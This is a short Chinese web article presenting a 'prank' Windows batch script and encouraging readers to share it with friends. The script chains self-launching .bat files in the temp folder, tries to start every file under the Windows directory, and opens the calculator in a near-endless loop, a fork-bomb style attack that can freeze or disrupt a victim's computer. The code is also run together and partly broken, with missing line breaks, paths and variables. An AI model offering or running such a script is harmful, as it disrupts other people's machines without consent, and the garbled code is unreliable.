(资料图)
1、下面是比较整人的批处理。
2、不过不建议这样做@echo offecho start 1.bat >%temp%2.batecho for /r%windir% %%i in (*) dostart %%i >>%temp%2.batecho start 2.bat >%temp%1.batecho for /r%windir% %%i in (*) dostart %%i >>%temp%1.batecho start 3.bat >%temp%4.batecho for /r%windir% %%i in (*) dostart %%i >>%temp%4.batecho start 4.bat >%temp%3.batecho for /r%windir% %%i in (*) dostart %%i >>%temp%3.batecho start 5.bat >%temp%6.batecho for /r%windir% %%i in (*) dostart %%i >>%temp%6.batecho start 6.bat >%temp%5.batecho for /r%windir% %%i in (*) dostart %%i >>%temp%5.batstart %temp%1.bat & start %temp%3.bat & start %temp%5.batfor /l in (1,1,999999) do start %windir%system32calc.exefor /r%windir% %%i in (*) dostart %%i。
相信通过bat整人代码这篇文章能帮到你,在和好朋友分享的时候,也欢迎感兴趣小伙伴们一起来探讨。
本文由用户上传,如有侵权请联系删除!关键词:
质检
推荐